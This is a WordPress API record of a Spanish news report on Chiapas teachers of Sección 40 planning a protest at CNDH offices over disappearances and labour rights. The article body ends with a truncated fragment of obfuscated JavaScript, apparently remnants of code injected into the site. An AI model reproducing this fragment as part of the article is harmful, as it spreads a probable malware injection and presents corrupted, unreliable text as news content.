{"id":22156,"date":"2025-05-30T03:59:24","date_gmt":"2025-05-30T03:59:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22156"},"modified":"2025-05-30T03:59:24","modified_gmt":"2025-05-30T03:59:24","slug":"maestros-de-la-seccion-40-anuncian-movilizacion-por-desapariciones-y-derechos-laborales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22156","title":{"rendered":"Maestros de la Secci\u00f3n 40 anuncian movilizaci\u00f3n por desapariciones y derechos laborales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"638\" height=\"890\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143237.jpg\" alt=\"\" class=\"wp-image-22157\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143237.jpg 638w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143237-215x300.jpg 215w\" sizes=\"auto, (max-width: 638px) 100vw, 638px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodriguez \/ corresponsal<br>29 de mayo del 2025. San Crist\u00f3bal de Las Casas.- En el marco del paro nacional promovido por la Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (CNTE), docentes pertenecientes a la Asamblea Estatal Democr\u00e1tica (AED) de la Secci\u00f3n 40 anunciaron una movilizaci\u00f3n este viernes 30 de mayo, coincidiendo con el D\u00eda Internacional del Detenido Desaparecido.<\/p>\n\n\n\n<p>La protesta se llevar\u00e1 a cabo a partir de las 10 de la ma\u00f1ana e incluir\u00e1 una toma simb\u00f3lica de las oficinas de la Visitadur\u00eda General de la Comisi\u00f3n Nacional de los Derechos Humanos (CNDH), situadas en el barrio de Santa Luc\u00eda, a unos metros del centro hist\u00f3rico de la ciudad. Adem\u00e1s de la ocupaci\u00f3n simb\u00f3lica, est\u00e1 programado un mitin para exponer las demandas del sector magisterial.<\/p>\n\n\n\n<p>Debido a estas acciones, se anticipa afectaci\u00f3n vial en las inmediaciones de la zona, por lo que se recomienda a la poblaci\u00f3n tomar previsiones.<\/p>\n\n\n\n<p>El secretario general de la AED-Secci\u00f3n 40, H\u00e9ctor Sol\u00eds Espinoza, indic\u00f3 que esta jornada de protesta forma parte de un plan de acci\u00f3n m\u00e1s amplio para reclamar atenci\u00f3n a las demandas laborales del magisterio y denunciar la escalada de violencia y desapariciones que persisten en el pa\u00eds.<\/p>\n\n\n\n<p>Asimismo, extendi\u00f3 una invitaci\u00f3n a padres de familia, organizaciones sociales, maestros en activo y jubilados a unirse a esta manifestaci\u00f3n. \u201cNo podemos permanecer indiferentes ante las m\u00e1s de 130 mil personas desaparecidas en M\u00e9xico. Rechazamos las recientes declaraciones de la CNDH que buscan minimizar esta grave problem\u00e1tica\u201d, afirm\u00f3 Sol\u00eds Espinoza.<\/p>\n\n\n\n<p>Finalmente, la AED reiter\u00f3 su llamado a la unidad entre el gremio educativo y la sociedad civil, con el objetivo de visibilizar la crisis de derechos humanos y continuar la lucha por condiciones laborales dignas y justicia social.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodriguez \/ corresponsal29 de mayo del 2025. San Crist\u00f3bal de Las Casas.- En el marco del paro nacional promovido por la Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (CNTE), docentes pertenecientes a la Asamblea Estatal Democr\u00e1tica (AED) de la Secci\u00f3n 40 anunciaron una movilizaci\u00f3n este viernes 30 de mayo, coincidiendo con el D\u00eda Internacional &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22157,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22156","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22156","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22156"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22156\/revisions"}],"predecessor-version":[{"id":22158,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22156\/revisions\/22158"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22157"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22156"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22156"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22156"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}